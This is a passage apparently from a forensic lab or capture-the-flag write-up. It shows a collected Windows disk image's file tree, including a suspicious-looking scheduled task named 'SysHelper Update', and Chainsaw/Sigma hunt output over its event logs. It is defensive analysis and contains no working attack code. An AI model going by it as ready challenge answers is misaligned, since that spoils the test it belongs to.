│       │   │   │   │   ├── WDI
│       │   │   │   │   │   └── ResolutionHost
│       │   │   │   │   ├── WindowsColorSystem
│       │   │   │   │   │   └── Calibration Loader
│       │   │   │   │   ├── Windows Defender
│       │   │   │   │   │   ├── Windows Defender Cache Maintenance
│       │   │   │   │   │   ├── Windows Defender Cleanup
│       │   │   │   │   │   ├── Windows Defender Scheduled Scan
│       │   │   │   │   │   └── Windows Defender Verification
│       │   │   │   │   ├── Windows Error Reporting
│       │   │   │   │   │   └── QueueReporting
│       │   │   │   │   ├── Windows Filtering Platform
│       │   │   │   │   │   └── BfeOnServiceStartTypeChange
│       │   │   │   │   ├── Windows Media Sharing
│       │   │   │   │   │   └── UpdateLibrary
│       │   │   │   │   ├── WindowsUpdate
│       │   │   │   │   │   └── Scheduled Start
│       │   │   │   │   ├── Wininet
│       │   │   │   │   │   └── CacheTask
│       │   │   │   │   ├── WlanSvc
│       │   │   │   │   │   └── CDSSync
│       │   │   │   │   ├── WOF
│       │   │   │   │   │   ├── WIM-Hash-Management
│       │   │   │   │   │   └── WIM-Hash-Validation
│       │   │   │   │   ├── Work Folders
│       │   │   │   │   │   ├── Work Folders Logon Synchronization
│       │   │   │   │   │   └── Work Folders Maintenance Work
│       │   │   │   │   ├── Workplace Join
│       │   │   │   │   │   ├── Automatic-Device-Join
│       │   │   │   │   │   ├── Device-Sync
│       │   │   │   │   │   └── Recovery-Check
│       │   │   │   │   └── WwanSvc
│       │   │   │   │       ├── NotificationTask
│       │   │   │   │       └── OobeDiscovery
│       │   │   │   └── XblGameSave
│       │   │   │       └── XblGameSaveTask
│       │   │   ├── MicrosoftEdgeUpdateTaskMachineCore
│       │   │   ├── MicrosoftEdgeUpdateTaskMachineUA
│       │   │   ├── OneDrive Reporting Task-S-1-5-21-3871582759-1638593395-315824688-1002
│       │   │   ├── OneDrive Reporting Task-S-1-5-21-3871582759-1638593395-315824688-500
│       │   │   ├── OneDrive Standalone Update Task-S-1-5-21-3871582759-1638593395-315824688-1002
│       │   │   ├── OneDrive Standalone Update Task-S-1-5-21-3871582759-1638593395-315824688-500
│       │   │   ├── OneDrive Startup Task-S-1-5-21-3871582759-1638593395-315824688-1002
│       │   │   ├── OneDrive Startup Task-S-1-5-21-3871582759-1638593395-315824688-500
│       │   │   └── SysHelper Update
│       │   ├── wbem
│       │   │   └── Repository
│       │   │       ├── INDEX.BTR
│       │   │       ├── MAPPING1.MAP
│       │   │       ├── MAPPING2.MAP
│       │   │       ├── MAPPING3.MAP
│       │   │       └── OBJECTS.DATA
│       │   ├── WDI
│       │   │   ├── {67144949-5132-4859-8036-a737b43825d8}
│       │   │   │   ├── {7279a32a-2acb-41b6-84fe-926d65b9f283}
│       │   │   │   │   └── snapshot.etl
│       │   │   │   ├── {ab4d2cf1-207b-455a-aab3-89331493555d}
│       │   │   │   │   └── snapshot.etl
│       │   │   │   └── {e5ac67ee-f45e-4672-917c-c0caac259cde}
│       │   │   │       └── snapshot.etl
│       │   │   ├── {86432a0b-3c7d-4ddf-a89c-172faa90485d}
│       │   │   │   ├── {024525de-dbe4-4b29-9948-674682cbff61}
│       │   │   │   │   └── snapshot.etl
│       │   │   │   ├── {6222cfad-9a32-4ade-aaa8-a8da3274858b}
│       │   │   │   │   └── snapshot.etl
│       │   │   │   ├── {7367e702-93ef-4430-8264-c72cb4b964cb}
│       │   │   │   │   └── snapshot.etl
│       │   │   │   ├── {818de6c2-72b3-492a-a054-baefc5284902}
│       │   │   │   │   └── snapshot.etl
│       │   │   │   ├── S-1-5-21-3871582759-1638593395-315824688-1001_UserData.bin
│       │   │   │   ├── S-1-5-21-3871582759-1638593395-315824688-1002_UserData.bin
│       │   │   │   └── S-1-5-21-3871582759-1638593395-315824688-500_UserData.bin
│       │   │   └── LogFiles
│       │   │       ├── BootPerfDiagLogger.etl
│       │   │       ├── ShutdownPerfDiagLogger.etl
│       │   │       ├── WdiContextLog.etl.001
│       │   │       ├── WdiContextLog.etl.002
│       │   │       └── WdiContextLog.etl.003
│       │   └── winevt
│       │       └── logs
│       │           ├── Application.evtx
│       │           ├── Microsoft-Client-Licensing-Platform%4Admin.evtx
│       │           ├── Microsoft-Windows-AAD%4Operational.evtx
│       │           ├── Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx
│       │           ├── Microsoft-Windows-AppModel-Runtime%4Admin.evtx
│       │           ├── Microsoft-Windows-AppReadiness%4Admin.evtx
│       │           ├── Microsoft-Windows-AppReadiness%4Operational.evtx
│       │           ├── Microsoft-Windows-AppXDeployment%4Operational.evtx
│       │           ├── Microsoft-Windows-AppXDeploymentServer%4Operational.evtx
│       │           ├── Microsoft-Windows-AppxPackaging%4Operational.evtx
│       │           ├── Microsoft-Windows-Authentication User Interface%4Operational.evtx
│       │           ├── Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx
│       │           ├── Microsoft-Windows-Biometrics%4Operational.evtx
│       │           ├── Microsoft-Windows-BitLocker%4BitLocker Management.evtx
│       │           ├── Microsoft-Windows-Bits-Client%4Operational.evtx
│       │           ├── Microsoft-Windows-CloudStore%4Operational.evtx
│       │           ├── Microsoft-Windows-CodeIntegrity%4Operational.evtx
│       │           ├── Microsoft-Windows-Containers-BindFlt%4Operational.evtx
│       │           ├── Microsoft-Windows-Containers-Wcifs%4Operational.evtx
│       │           ├── Microsoft-Windows-Crypto-DPAPI%4Operational.evtx
│       │           ├── Microsoft-Windows-Crypto-NCrypt%4Operational.evtx
│       │           ├── Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx
│       │           ├── Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Operational.evtx
│       │           ├── Microsoft-Windows-DeviceSetupManager%4Admin.evtx
│       │           ├── Microsoft-Windows-DeviceSetupManager%4Operational.evtx
│       │           ├── Microsoft-Windows-Dhcp-Client%4Admin.evtx
│       │           ├── Microsoft-Windows-Dhcpv6-Client%4Admin.evtx
│       │           ├── Microsoft-Windows-Diagnosis-DPS%4Operational.evtx
│       │           ├── Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx
│       │           ├── Microsoft-Windows-Diagnosis-Scripted%4Admin.evtx
│       │           ├── Microsoft-Windows-Diagnosis-Scripted%4Operational.evtx
│       │           ├── Microsoft-Windows-Diagnostics-Performance%4Operational.evtx
│       │           ├── Microsoft-Windows-DiskDiagnosticDataCollector%4Operational.evtx
│       │           ├── Microsoft-Windows-GroupPolicy%4Operational.evtx
│       │           ├── Microsoft-Windows-HelloForBusiness%4Operational.evtx
│       │           ├── Microsoft-Windows-IKE%4Operational.evtx
│       │           ├── Microsoft-Windows-Kernel-Boot%4Operational.evtx
│       │           ├── Microsoft-Windows-Kernel-EventTracing%4Admin.evtx
│       │           ├── Microsoft-Windows-Kernel-PnP%4Configuration.evtx
│       │           ├── Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx
│       │           ├── Microsoft-Windows-Kernel-WHEA%4Operational.evtx
│       │           ├── Microsoft-Windows-Known Folders API Service.evtx
│       │           ├── Microsoft-Windows-LanguagePackSetup%4Operational.evtx
│       │           ├── Microsoft-Windows-LiveId%4Operational.evtx
│       │           ├── Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4Autopilot.evtx
│       │           ├── Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4ManagementService.evtx
│       │           ├── Microsoft-Windows-MUI%4Operational.evtx
│       │           ├── Microsoft-Windows-NcdAutoSetup%4Operational.evtx
│       │           ├── Microsoft-Windows-NCSI%4Operational.evtx
│       │           ├── Microsoft-Windows-NetworkProfile%4Operational.evtx
│       │           ├── Microsoft-Windows-Ntfs%4Operational.evtx
│       │           ├── Microsoft-Windows-Ntfs%4WHC.evtx
│       │           ├── Microsoft-Windows-Partition%4Diagnostic.evtx
│       │           ├── Microsoft-Windows-PowerShell%4Operational.evtx
│       │           ├── Microsoft-Windows-Privacy-Auditing%4Operational.evtx
│       │           ├── Microsoft-Windows-Provisioning-Diagnostics-Provider%4Admin.evtx
│       │           ├── Microsoft-Windows-PushNotification-Platform%4Operational.evtx
│       │           ├── Microsoft-Windows-ReadyBoost%4Operational.evtx
│       │           ├── Microsoft-Windows-RemoteDesktopServices-RdpCoreTS%4Admin.evtx
│       │           ├── Microsoft-Windows-RemoteDesktopServices-RdpCoreTS%4Operational.evtx
│       │           ├── Microsoft-Windows-RemoteDesktopServices-SessionServices%4Operational.evtx
│       │           ├── Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx
│       │           ├── Microsoft-Windows-Security-LessPrivilegedAppContainer%4Operational.evtx
│       │           ├── Microsoft-Windows-Security-Mitigations%4UserMode.evtx
│       │           ├── Microsoft-Windows-Security-SPP-UX-Notifications%4ActionCenter.evtx
│       │           ├── Microsoft-Windows-SettingSync%4Debug.evtx
│       │           ├── Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx
│       │           ├── Microsoft-Windows-Shell-Core%4AppDefaults.evtx
│       │           ├── Microsoft-Windows-Shell-Core%4Operational.evtx
│       │           ├── Microsoft-Windows-SmartCard-DeviceEnum%4Operational.evtx
│       │           ├── Microsoft-Windows-SmbClient%4Connectivity.evtx
│       │           ├── Microsoft-Windows-SmbClient%4Security.evtx
│       │           ├── Microsoft-Windows-SMBServer%4Operational.evtx
│       │           ├── Microsoft-Windows-StateRepository%4Operational.evtx
│       │           ├── Microsoft-Windows-Storage-ClassPnP%4Operational.evtx
│       │           ├── Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx
│       │           ├── Microsoft-Windows-Storage-Storport%4Operational.evtx
│       │           ├── Microsoft-Windows-Store%4Operational.evtx
│       │           ├── Microsoft-Windows-Storsvc%4Diagnostic.evtx
│       │           ├── Microsoft-Windows-TaskScheduler%4Maintenance.evtx
│       │           ├── Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx
│       │           ├── Microsoft-Windows-TerminalServices-PnPDevices%4Admin.evtx
│       │           ├── Microsoft-Windows-TerminalServices-PnPDevices%4Operational.evtx
│       │           ├── Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx
│       │           ├── Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx
│       │           ├── Microsoft-Windows-TerminalServices-ServerUSBDevices%4Admin.evtx
│       │           ├── Microsoft-Windows-TerminalServices-ServerUSBDevices%4Operational.evtx
│       │           ├── Microsoft-Windows-Time-Service%4Operational.evtx
│       │           ├── Microsoft-Windows-TWinUI%4Operational.evtx
│       │           ├── Microsoft-Windows-TZSync%4Operational.evtx
│       │           ├── Microsoft-Windows-UniversalTelemetryClient%4Operational.evtx
│       │           ├── Microsoft-Windows-User Device Registration%4Admin.evtx
│       │           ├── Microsoft-Windows-UserPnp%4DeviceInstall.evtx
│       │           ├── Microsoft-Windows-User Profile Service%4Operational.evtx
│       │           ├── Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx
│       │           ├── Microsoft-Windows-Wcmsvc%4Operational.evtx
│       │           ├── Microsoft-Windows-WebAuthN%4Operational.evtx
│       │           ├── Microsoft-Windows-WER-PayloadHealth%4Operational.evtx
│       │           ├── Microsoft-Windows-WFP%4Operational.evtx
│       │           ├── Microsoft-Windows-Windows Defender%4Operational.evtx
│       │           ├── Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx
│       │           ├── Microsoft-Windows-WindowsSystemAssessmentTool%4Operational.evtx
│       │           ├── Microsoft-Windows-WindowsUpdateClient%4Operational.evtx
│       │           ├── Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx
│       │           ├── Microsoft-Windows-Winlogon%4Operational.evtx
│       │           ├── Microsoft-Windows-WinRM%4Operational.evtx
│       │           ├── Microsoft-Windows-WMI-Activity%4Operational.evtx
│       │           ├── Security.evtx
│       │           ├── Setup.evtx
│       │           ├── System.evtx
│       │           └── Windows PowerShell.evtx
│       └── Temp
│           └── MpCmdRun.log
└── EnduringEcho.zip

892 directories, 2993 files

┌──(kali㉿kali)-[~]
└─$ tree -la -L2 
.
├── 2025-08-25T20_20_59_5246365_ConsoleLog.txt
├── 2025-08-25T20_20_59_5246365_CopyLog.csv
├── 2025-08-25T20_20_59_5246365_SkipLog.csv.csv
└── C
    ├── $Boot
    ├── $Extend
    ├── $LogFile
    ├── $MFT
    ├── $Secure_$SDS
    ├── ProgramData
    ├── Users
    └── Windows

6 directories, 7 files

Let’s hunt the first Windows Event Logs:

┌──(kali㉿kali)-[~]
└─$ sudo chainsaw hunt -r rules -s sigma --mapping sigma-event-logs-all.yml C/Windows/System32/winevt/logs/ --skip-errors

 ██████╗██╗  ██╗ █████╗ ██╗███╗   ██╗███████╗ █████╗ ██╗    ██╗
██╔════╝██║  ██║██╔══██╗██║████╗  ██║██╔════╝██╔══██╗██║    ██║
██║     ███████║███████║██║██╔██╗ ██║███████╗███████║██║ █╗ ██║
██║     ██╔══██║██╔══██║██║██║╚██╗██║╚════██║██╔══██║██║███╗██║
╚██████╗██║  ██║██║  ██║██║██║ ╚████║███████║██║  ██║╚███╔███╔╝
 ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝ ╚══╝╚══╝
    By WithSecure Countercept (@FranticTyping, @AlexKornitzer)

[+] Loading detection rules from: 
[!] Loaded 3448 detection rules (3556 not loaded)
[+] Loading forensic artefacts from: C/Windows/System32/winevt/logs/ (extensions: .evt, .evtx)
[+] Loaded 111 forensic artefacts (78.0 MiB)
[+] Current Artifact: C/Windows/System32/winevt/logs/Security.evtx
[+] Hunting [=====>----------------------------------] 14/111 ⠇ [00:00:06]                                                                                                                                                                   [!] failed to parse document 'C/Windows/System32/winevt/logs/Security.evtx' - An error occurred while trying to deserialize evtx stream. - use --skip-errors to continue...                                                                  
[+] Current Artifact: C/Windows/System32/winevt/logs/Windows PowerShell.evtx
[+] Hunting [=========>------------------------------] 27/111 ⠴ [00:00:07]                                                                                                                                                                   [!] failed to parse document 'C/Windows/System32/winevt/logs/Windows PowerShell.evtx' - An error occurred while trying to deserialize evtx stream. - use --skip-errors to continue...                                                        
[+] Current Artifact: C/Windows/System32/winevt/logs/Microsoft-Windows-PowerShell%4Operational.evtx
[+] Hunting [=================>----------------------] 48/111 ⠏ [00:00:08]                                                                                                                                                                   [!] failed to parse document 'C/Windows/System32/winevt/logs/Microsoft-Windows-PowerShell%4Operational.evtx' - An error occurred while trying to deserialize evtx stream. - use --skip-errors to continue...                                 
[+] Current Artifact: C/Windows/System32/winevt/logs/Microsoft-Windows-WMI-Activity%4Operational.evtx
[+] Hunting [========================================] 111/111   [00:00:11]                                                                                                                                                                  
[+] Group: Sigma                                                                                                                                                                                                                             
┌─────────────────────┬─────────────────────────────────────┬───────┬────────────────────────────────┬──────────┬───────────┬─────────────────┬──────────────────────────────────┐
│      timestamp      │             detections              │ count │     Event.System.Provider      │ Event ID │ Record ID │    Computer     │            Event Data            │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 10:47:33 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4647     │ 586       │ DESKTOP-8IRBDLK │ TargetUserName: defaultuser0     │
│                     │                                     │       │ iting                          │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-1001   │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: DESKTOP-8IRB   │
│                     │                                     │       │                                │          │           │                 │ DLK                              │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x459ea'         │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 10:47:33 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 593       │ DESKTOP-8IRBDLK │ TargetUserName: UMFD-1           │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 2                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-96-0-1      │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: Font Driver    │
│                     │                                     │       │                                │          │           │                 │ Host                             │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x9d9d'          │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 10:47:35 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 604       │ DESKTOP-8IRBDLK │ TargetUserName: DWM-1            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 2                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-90-0-1      │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: Window Manag   │
│                     │                                     │       │                                │          │           │                 │ er                               │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0xf553'          │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 10:47:35 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 605       │ DESKTOP-8IRBDLK │ TargetUserName: DWM-1            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 2                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-90-0-1      │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: Window Manag   │
│                     │                                     │       │                                │          │           │                 │ er                               │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0xf52b'          │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 10:48:21 │ ‣ Potential In-Memory Execution     │ 1     │ Microsoft-Windows-PowerShell   │ 4104     │ 5         │ DESKTOP-8IRBDLK │ MessageNumber: 1                 │
│                     │ Using Reflection.Assembly           │       │                                │          │           │                 │ ScriptBlockText: "\r\nfunction   │
│                     │                                     │       │                                │          │           │                 │  ExtractPluginProperties([stri   │
│                     │                                     │       │                                │          │           │                 │ ng]$pluginDir, $objectToWriteT   │
│                     │                                     │       │                                │          │           │                 │ o) \r\n{\r\n  function Unescap   │
│                     │                                     │       │                                │          │           │                 │ e-Xml($s) {\r\n    if ($s) {\r   │
│                     │                                     │       │                                │          │           │                 │ \n      $s = $s.Replace(\"<   │
│                     │                                     │       │                                │          │           │                 │ \", \"<\");\r\n      $s = $s.R   │
│                     │                                     │       │                                │          │           │                 │ eplace(\">\", \">\");\r\n     │
│                     │                                     │       │                                │          │           │                 │     $s = $s.Replace(\""\"   │
│                     │                                     │       │                                │          │           │                 │ , '\"');\r\n      $s = $s.Repl   │
│                     │                                     │       │                                │          │           │                 │ ace(\"'\", \"'\");\r\n      │
│                     │                                     │       │                                │          │           │                 │    $s = $s.Replace(\"'\",    │
│                     │                                     │       │                                │          │           │                 │ \"'\");\r\n      $s = $s.Repla   │
│                     │                                     │       │                                │          │           │                 │ ce(\"&\", \"&\");\r\n    }   │
│                     │                                     │       │                                │          │           │                 │     \r\n    return $s;\r\n  }\   │
│                     │                                     │       │                                │          │           │                 │ r\n\r\n  # The default compare   │
│                     │                                     │       │                                │          │           │                 │ ...                              │
│                     │                                     │       │                                │          │           │                 │ (use --full to show all content) │
│                     │                                     │       │                                │          │           │                 │ ScriptBlockId: 9ee4b956-2adb-4   │
│                     │                                     │       │                                │          │           │                 │ 41b-98cc-8db98f309b59            │
│                     │                                     │       │                                │          │           │                 │ MessageTotal: 1                  │
│                     │                                     │       │                                │          │           │                 │ Path: ''                         │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 10:48:30 │ ‣ Powershell File and Directory     │ 1     │ Microsoft-Windows-PowerShell   │ 4104     │ 6         │ DESKTOP-8IRBDLK │ MessageNumber: 1                 │
│                     │ Discovery                           │       │                                │          │           │                 │ ScriptBlockText: "\r\nfunction   │
│                     │ ‣ Use Of Remove-Item to             │       │                                │          │           │                 │  Set-PSSessionConfiguration([P   │
│                     │ Delete File - ScriptBlock           │       │                                │          │           │                 │ SObject]$customShellObject, \r   │
│                     │                                     │       │                                │          │           │                 │ \n   [Array]$initParametersMap   │
│                     │                                     │       │                                │          │           │                 │ ,\r\n   [bool]$force,\r\n   [s   │
│                     │                                     │       │                                │          │           │                 │ tring]$sddl,\r\n   [bool]$isSd   │
│                     │                                     │       │                                │          │           │                 │ dlSpecified,\r\n   [bool]$shou   │
│                     │                                     │       │                                │          │           │                 │ ldShowUI,\r\n   [string]$resou   │
│                     │                                     │       │                                │          │           │                 │ rceUri,\r\n   [string]$pluginN   │
│                     │                                     │       │                                │          │           │                 │ otFoundErrorMsg,\r\n   [string   │
│                     │                                     │       │                                │          │           │                 │ ]$pluginNotPowerShellMsg,\r\n    │
│                     │                                     │       │                                │          │           │                 │   [System.Management.Automatio   │
│                     │                                     │       │                                │          │           │                 │ n.Runspaces.PSSessionConfigura   │
│                     │                                     │       │                                │          │           │                 │ tionAccessMode]$accessMode\r\n   │
│                     │                                     │       │                                │          │           │                 │ )\r\n{\r\n  $wsmanPluginDir =    │
│                     │                                     │       │                                │          │           │                 │ 'WSMan:\\localhost\\Plugin'\r\   │
│                     │                                     │       │                                │          │           │                 │ ...                              │
│                     │                                     │       │                                │          │           │                 │ (use --full to show all content) │
│                     │                                     │       │                                │          │           │                 │ ScriptBlockId: 75e2b00c-602d-4   │
│                     │                                     │       │                                │          │           │                 │ 70e-8547-d26cf5fc3465            │
│                     │                                     │       │                                │          │           │                 │ MessageTotal: 1                  │
│                     │                                     │       │                                │          │           │                 │ Path: ''                         │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 10:48:55 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 662       │ DESKTOP-8IRBDLK │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: DESKTOP-8IRB   │
│                     │                                     │       │                                │          │           │                 │ DLK                              │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x2673cd'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 10:49:09 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 679       │ DESKTOP-8IRBDLK │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: DESKTOP-8IRB   │
│                     │                                     │       │                                │          │           │                 │ DLK                              │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x28efb2'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 10:49:14 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 700       │ DESKTOP-8IRBDLK │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: DESKTOP-8IRB   │
│                     │                                     │       │                                │          │           │                 │ DLK                              │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x285209'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 10:49:19 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 709       │ DESKTOP-8IRBDLK │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: DESKTOP-8IRB   │
│                     │                                     │       │                                │          │           │                 │ DLK                              │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x2af305'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 10:49:21 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 713       │ DESKTOP-8IRBDLK │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: DESKTOP-8IRB   │
│                     │                                     │       │                                │          │           │                 │ DLK                              │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x2af6ec'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 10:49:23 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 717       │ DESKTOP-8IRBDLK │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: DESKTOP-8IRB   │
│                     │                                     │       │                                │          │           │                 │ DLK                              │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x2aabfc'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 10:49:24 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 718       │ DESKTOP-8IRBDLK │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: DESKTOP-8IRB   │
│                     │                                     │       │                                │          │           │                 │ DLK                              │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x299a6f'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 10:49:24 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 719       │ DESKTOP-8IRBDLK │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: DESKTOP-8IRB   │
│                     │                                     │       │                                │          │           │                 │ DLK                              │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x2afaed'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 10:49:35 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 729       │ DESKTOP-8IRBDLK │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: DESKTOP-8IRB   │
│                     │                                     │       │                                │          │           │                 │ DLK                              │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x2c33a1'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 10:49:37 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 733       │ DESKTOP-8IRBDLK │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: DESKTOP-8IRB   │
│                     │                                     │       │                                │          │           │                 │ DLK                              │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x2c8f20'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
